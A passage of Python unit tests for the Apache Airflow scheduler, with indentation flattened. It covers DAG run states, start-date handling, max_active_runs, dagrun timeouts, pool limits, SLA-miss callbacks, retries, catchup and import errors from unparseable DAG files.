if run_kwargs is None:
run_kwargs = {}
scheduler = SchedulerJob()
dag = self.dagbag.get_dag(dag_id)
dag.clear()
dr = scheduler.create_dag_run(dag)
if advance_execution_date:
# run a second time to schedule a dagrun after the start_date
dr = scheduler.create_dag_run(dag)
ex_date = dr.execution_date
try:
dag.run(start_date=ex_date, end_date=ex_date, **run_kwargs)
except AirflowException:
pass
# test tasks
for task_id, expected_state in expected_task_states.items():
task = dag.get_task(task_id)
ti = TI(task, ex_date)
ti.refresh_from_db()
self.assertEqual(ti.state, expected_state)
# load dagrun
dr = DagRun.find(dag_id=dag_id, execution_date=ex_date)
dr = dr[0]
dr.dag = dag
self.assertEqual(dr.state, dagrun_state)
def test_dagrun_fail(self):
"""
DagRuns with one failed and one incomplete root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_fail',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.UPSTREAM_FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_success(self):
"""
DagRuns with one failed and one successful root task -> SUCCESS
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_success',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.SUCCESS,
},
dagrun_state=State.SUCCESS)
def test_dagrun_root_fail(self):
"""
DagRuns with one successful and one failed root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_root_fail',
expected_task_states={
'test_dagrun_succeed': State.SUCCESS,
'test_dagrun_fail': State.FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_root_fail_unfinished(self):
"""
DagRuns with one unfinished and one failed root task -> RUNNING
"""
# Run both the failed and successful tasks
scheduler = SchedulerJob()
dag_id = 'test_dagrun_states_root_fail_unfinished'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
dr = scheduler.create_dag_run(dag)
try:
dag.run(start_date=dr.execution_date, end_date=dr.execution_date)
except AirflowException: # Expect an exception since there is a failed task
pass
# Mark the successful task as never having run since we want to see if the
# dagrun will be in a running state despite haveing an unfinished task.
with create_session() as session:
ti = dr.get_task_instance('test_dagrun_unfinished', session=session)
ti.state = State.NONE
session.commit()
dr_state = dr.update_state()
self.assertEqual(dr_state, State.RUNNING)
def test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date(self):
"""
DagRun is marked a success if ignore_first_depends_on_past=True
Test that an otherwise-deadlocked dagrun is marked as a success
if ignore_first_depends_on_past=True and the dagrun execution_date
is after the start_date.
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
advance_execution_date=True,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_dagrun_deadlock_ignore_depends_on_past(self):
"""
Test that ignore_first_depends_on_past doesn't affect results
(this is the same test as
test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date except
that start_date == execution_date so depends_on_past is irrelevant).
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_scheduler_start_date(self):
"""
Test that the scheduler respects start_dates, even when DAGS have run
"""
with create_session() as session:
dag_id = 'test_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertTrue(dag.start_date > datetime.datetime.utcnow())
scheduler = SchedulerJob(dag_id,
subdir=os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py'),
num_runs=1)
scheduler.run()
# zero tasks ran
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
session.commit()
# previously, running this backfill would kick off the Scheduler
# because it would take the most recent run and start from there
# That behavior still exists, but now it will only do so if after the
# start date
backfill = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
backfill.run()
# one task ran
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
session.commit()
scheduler = SchedulerJob(dag_id,
subdir=os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py'),
num_runs=1)
scheduler.run()
# still one task
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
session.commit()
def test_scheduler_task_start_date(self):
"""
Test that the scheduler respects task start dates that are different
from DAG start dates
"""
dag_id = 'test_task_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_id,
subdir=os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py'),
num_runs=2)
scheduler.run()
session = settings.Session()
tiq = session.query(TI).filter(TI.dag_id == dag_id)
ti1s = tiq.filter(TI.task_id == 'dummy1').all()
ti2s = tiq.filter(TI.task_id == 'dummy2').all()
self.assertEqual(len(ti1s), 0)
self.assertEqual(len(ti2s), 2)
for t in ti2s:
self.assertEqual(t.state, State.SUCCESS)
def test_scheduler_multiprocessing(self):
"""
Test that the scheduler can successfully queue multiple dags in parallel
"""
dag_ids = ['test_start_date_scheduling', 'test_dagrun_states_success']
for dag_id in dag_ids:
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
subdir=os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py'),
num_runs=1)
scheduler.run()
# zero tasks ran
dag_id = 'test_start_date_scheduling'
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
def test_scheduler_dagrun_once(self):
"""
Test if the scheduler does not create multiple dagruns
if a dag is scheduled with @once and a start_date
"""
dag = DAG(
'test_scheduler_dagrun_once',
start_date=timezone.datetime(2015, 1, 1),
schedule_interval="@once")
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
@parameterized.expand([
[State.NONE, None, None],
[State.UP_FOR_RETRY, timezone.utcnow() - datetime.timedelta(minutes=30),
timezone.utcnow() - datetime.timedelta(minutes=15)],
[State.UP_FOR_RESCHEDULE, timezone.utcnow() - datetime.timedelta(minutes=30),
timezone.utcnow() - datetime.timedelta(minutes=15)],
])
def test_scheduler_process_task_instances(self, state, start_date, end_date):
"""
Test if _process_task_instances puts the right task instances into the
queue.
"""
dag = DAG(
dag_id='test_scheduler_process_execute_task',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
with create_session() as session:
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
with create_session() as session:
tis = dr.get_task_instances(session=session)
for ti in tis:
ti.state = state
ti.start_date = start_date
ti.end_date = end_date
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE, TRY_NUMBER)
)
def test_scheduler_do_not_schedule_removed_task(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_do_not_schedule_too_early(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_too_early',
start_date=timezone.datetime(2200, 1, 1))
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_do_not_run_finished(self):
dag = DAG(
dag_id='test_scheduler_do_not_run_finished',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances(session=session)
for ti in tis:
ti.state = State.SUCCESS
session.commit()
session.close()
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_add_new_task(self):
"""
Test if a task instance will be added if the dag is updated
"""
dag = DAG(
dag_id='test_scheduler_add_new_task',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances()
self.assertEqual(len(tis), 1)
DummyOperator(
task_id='dummy2',
dag=dag,
owner='airflow')
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
tis = dr.get_task_instances()
self.assertEqual(len(tis), 2)
def test_scheduler_verify_max_active_runs(self):
"""
Test if a a dagrun will not be scheduled if max_dag_runs has been reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
def test_scheduler_fail_dagrun_timeout(self):
"""
Test if a a dagrun wil be set failed if timeout
"""
dag = DAG(
dag_id='test_scheduler_fail_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.dagrun_timeout = datetime.timedelta(seconds=60)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
dr2 = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr2)
dr.refresh_from_db(session=session)
self.assertEqual(dr.state, State.FAILED)
def test_scheduler_verify_max_active_runs_and_dagrun_timeout(self):
"""
Test if a a dagrun will not be scheduled if max_dag_runs
has been reached and dagrun_timeout is not reached
Test if a a dagrun will be scheduled if max_dag_runs has
been reached but dagrun_timeout is also reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs_and_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
dag.dagrun_timeout = datetime.timedelta(seconds=60)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
# Should not be scheduled as DagRun has not timedout and max_active_runs is reached
new_dr = scheduler.create_dag_run(dag)
self.assertIsNone(new_dr)
# Should be scheduled as dagrun_timeout has passed
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
new_dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(new_dr)
def test_scheduler_max_active_runs_respected_after_clear(self):
"""
Test if _process_task_instances only schedules ti's up to max_active_runs
(related to issue AIRFLOW-137)
"""
dag = DAG(
dag_id='test_scheduler_max_active_runs_respected_after_clear',
start_date=DEFAULT_DATE)
dag.max_active_runs = 3
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
# First create up to 3 dagruns in RUNNING state.
scheduler.create_dag_run(dag)
# Reduce max_active_runs to 1
dag.max_active_runs = 1
queue = Mock()
# and schedule them in, so we can check how many
# tasks are put on the queue (should be one, not 3)
scheduler._process_task_instances(dag, queue=queue)
queue.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE, TRY_NUMBER)
)
@patch.object(TI, 'pool_full')
def test_scheduler_verify_pool_full(self, mock_pool_full):
"""
Test task instances not queued when pool is full
"""
mock_pool_full.return_value = False
dag = DAG(
dag_id='test_scheduler_verify_pool_full',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow',
pool='test_scheduler_verify_pool_full')
session = settings.Session()
pool = Pool(pool='test_scheduler_verify_pool_full', slots=1)
session.add(pool)
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
# Create 2 dagruns, which will create 2 task instances.
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEqual(dr.execution_date, DEFAULT_DATE)
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
queue = []
scheduler._process_task_instances(dag, queue=queue)
self.assertEqual(len(queue), 2)
dagbag = self._make_simple_dag_bag([dag])
# Recreated part of the scheduler here, to kick off tasks -> executor
for ti_key in queue:
task = dag.get_task(ti_key[1])
ti = TI(task, ti_key[2])
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# Also save this task instance to the DB.
session.merge(ti)
session.commit()
scheduler._execute_task_instances(dagbag,
(State.SCHEDULED,
State.UP_FOR_RETRY))
self.assertEqual(len(scheduler.executor.queued_tasks), 1)
def test_scheduler_auto_align(self):
"""
Test if the schedule_interval will be auto aligned with the start_date
such that if the start_date coincides with the schedule the first
execution_date will be start_date, otherwise it will be start_date +
interval.
"""
dag = DAG(
dag_id='test_scheduler_auto_align_1',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="4 5 * * *"
)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEqual(dr.execution_date, timezone.datetime(2016, 1, 2, 5, 4))
dag = DAG(
dag_id='test_scheduler_auto_align_2',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="10 10 * * *"
)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEqual(dr.execution_date, timezone.datetime(2016, 1, 1, 10, 10))
def test_scheduler_reschedule(self):
"""
Checks if tasks that are not taken up by the executor
get rescheduled
"""
executor = TestExecutor()
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_scheduler_reschedule',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.models.DagBag', return_value=dagbag)
@mock.patch('airflow.models.DagBag.collect_dags')
def do_schedule(function, function2):
# Use a empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEqual(1, len(executor.queued_tasks))
executor.queued_tasks.clear()
do_schedule()
self.assertEqual(2, len(executor.queued_tasks))
def test_scheduler_sla_miss_callback(self):
"""
Test that the scheduler does not call the sla_miss_callback when a notification has already been sent
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
sla_callback = MagicMock()
# Create dag with a start of 2 days ago, but an sla of 1 day
# ago so we'll already have an sla_miss on the books
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow')
# Create a TaskInstance for two days ago
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date,
email_sent=False,
notification_sent=True))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_not_called()
def test_scheduler_sla_miss_callback_exception(self):
"""
Test that the scheduler gracefully logs an exception if there is a problem
calling the sla_miss_callback
"""
session = settings.Session()
sla_callback = MagicMock(side_effect=RuntimeError('Could not call function'))
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='Success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss')
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_called()
mock_log().exception.assert_called_with(
'Could not call sla_miss_callback for DAG %s',
'test_sla_miss')
@mock.patch("airflow.utils.email.send_email")
def test_scheduler_sla_miss_email_exception(self, mock_send_email):
"""
Test that the scheduler gracefully logs an exception if there is a problem
sending an email
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
mock_send_email.side_effect = RuntimeError('Could not send an email')
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
email='test@test.com',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='Success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
mock_log().exception.assert_called_with(
'Could not send SLA Miss email notification for DAG %s',
'test_sla_miss')
def test_retry_still_in_executor(self):
"""
Checks if the scheduler does not put a task in limbo, when a task is retried
but is still present in the executor.
"""
executor = TestExecutor()
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_retry_still_in_executor',
start_date=DEFAULT_DATE,
schedule_interval="@once")
dag_task1 = BashOperator(
task_id='test_retry_handling_op',
bash_command='exit 1',
retries=1,
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.models.DagBag', return_value=dagbag)
@mock.patch('airflow.models.DagBag.collect_dags')
def do_schedule(function, function2):
# Use a empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEqual(1, len(executor.queued_tasks))
def run_with_error(task):
try:
task.run()
except AirflowException:
pass
ti_tuple = six.next(six.itervalues(executor.queued_tasks))
(command, priority, queue, simple_ti) = ti_tuple
ti = simple_ti.construct_task_instance()
ti.task = dag_task1
self.assertEqual(ti.try_number, 1)
# fail execution
run_with_error(ti)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
self.assertEqual(ti.try_number, 2)
ti.refresh_from_db(lock_for_update=True, session=session)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
# do not schedule
do_schedule()
self.assertTrue(executor.has_task(ti))
ti.refresh_from_db()
# removing self.assertEqual(ti.state, State.SCHEDULED)
# as scheduler will move state from SCHEDULED to QUEUED
# now the executor has cleared and it should be allowed the re-queue,
# but tasks stay in the executor.queued_tasks after executor.heartbeat()
# will be set back to SCHEDULED state
executor.queued_tasks.clear()
do_schedule()
ti.refresh_from_db()
self.assertEqual(ti.state, State.SCHEDULED)
# To verify that task does get re-queued.
executor.queued_tasks.clear()
executor.do_update = True
do_schedule()
ti.refresh_from_db()
self.assertEqual(ti.state, State.RUNNING)
@unittest.skipUnless("INTEGRATION" in os.environ, "Can only run end to end")
def test_retry_handling_job(self):
"""
Integration test of the scheduler not accidentally resetting
the try_numbers for a task
"""
dag = self.dagbag.get_dag('test_retry_handling_job')
dag_task1 = dag.get_task("test_retry_handling_op")
dag.clear()
scheduler = SchedulerJob(dag_id=dag.dag_id,
num_runs=1)
scheduler.heartrate = 0
scheduler.run()
session = settings.Session()
ti = session.query(TI).filter(TI.dag_id == dag.dag_id,
TI.task_id == dag_task1.task_id).first()
# make sure the counter has increased
self.assertEqual(ti.try_number, 2)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
def test_dag_with_system_exit(self):
"""
Test to check that a DAG with a system.exit() doesn't break the scheduler.
"""
dag_id = 'exit_test_dag'
dag_ids = [dag_id]
dag_directory = os.path.join(settings.DAGS_FOLDER,
"..",
"dags_with_system_exit")
dag_file = os.path.join(dag_directory,
'b_test_scheduler_dags.py')
dagbag = DagBag(dag_folder=dag_file)
for dag_id in dag_ids:
dag = dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
subdir=dag_directory,
num_runs=1)
scheduler.run()
with create_session() as session:
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
def test_dag_get_active_runs(self):
"""
Test to check that a DAG returns its active runs
"""
now = timezone.utcnow()
six_hours_ago_to_the_hour = \
(now - datetime.timedelta(hours=6)).replace(minute=0, second=0, microsecond=0)
START_DATE = six_hours_ago_to_the_hour
DAG_NAME1 = 'get_active_runs_test'
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': START_DATE
}
dag1 = DAG(DAG_NAME1,
schedule_interval='* * * * *',
max_active_runs=1,
default_args=default_args
)
run_this_1 = DummyOperator(task_id='run_this_1', dag=dag1)
run_this_2 = DummyOperator(task_id='run_this_2', dag=dag1)
run_this_2.set_upstream(run_this_1)
run_this_3 = DummyOperator(task_id='run_this_3', dag=dag1)
run_this_3.set_upstream(run_this_2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag1.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag1.clear()
dr = scheduler.create_dag_run(dag1)
# We had better get a dag run
self.assertIsNotNone(dr)
execution_date = dr.execution_date
running_dates = dag1.get_active_runs()
try:
running_date = running_dates[0]
except Exception:
running_date = 'Except'
self.assertEqual(execution_date, running_date, 'Running Date must match Execution Date')
def test_dag_catchup_option(self):
"""
Test to check that a DAG with catchup = False only schedules beginning now, not back to the start date
"""
def setup_dag(dag_id, schedule_interval, start_date, catchup):
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': start_date
}
dag = DAG(dag_id,
schedule_interval=schedule_interval,
max_active_runs=1,
catchup=catchup,
default_args=default_args)
t1 = DummyOperator(task_id='t1', dag=dag)
t2 = DummyOperator(task_id='t2', dag=dag)
t2.set_upstream(t1)
t3 = DummyOperator(task_id='t3', dag=dag)
t3.set_upstream(t2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
return dag
now = timezone.utcnow()
six_hours_ago_to_the_hour = (now - datetime.timedelta(hours=6)).replace(
minute=0, second=0, microsecond=0)
half_an_hour_ago = now - datetime.timedelta(minutes=30)
two_hours_ago = now - datetime.timedelta(hours=2)
scheduler = SchedulerJob()
dag1 = setup_dag(dag_id='dag_with_catchup',
schedule_interval='* * * * *',
start_date=six_hours_ago_to_the_hour,
catchup=True)
default_catchup = configuration.conf.getboolean('scheduler', 'catchup_by_default')
self.assertEqual(default_catchup, True)
self.assertEqual(dag1.catchup, True)
dag2 = setup_dag(dag_id='dag_without_catchup_ten_minute',
schedule_interval='*/10 * * * *',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag2)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last half an hour, not 6 hours ago
self.assertGreater(dr.execution_date, half_an_hour_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
dag3 = setup_dag(dag_id='dag_without_catchup_hourly',
schedule_interval='@hourly',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag3)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last 2 hours, not 6 hours ago
self.assertGreater(dr.execution_date, two_hours_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
dag4 = setup_dag(dag_id='dag_without_catchup_once',
schedule_interval='@once',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag4)
self.assertIsNotNone(dr)
def test_add_unparseable_file_before_sched_start_creates_import_error(self):
dags_folder = mkdtemp()
try:
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_add_unparseable_file_after_sched_start_creates_import_error(self):
dags_folder = mkdtemp()
try:
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_no_import_errors_with_parseable_dag(self):
try:
dags_folder = mkdtemp()
parseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(parseable_filename, 'w') as parseable_file:
parseable_file.writelines(PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_new_import_error_replaces_old(self):
try:
dags_folder = mkdtemp()
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Generate replacement import error (the error will be on the second line now)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(
PARSEABLE_DAG_FILE_CONTENTS +
os.linesep +
UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 2)".format(TEMP_DAG_FILENAME))
def test_remove_error_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Remove the import error from the file
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(
PARSEABLE_DAG_FILE_CONTENTS)
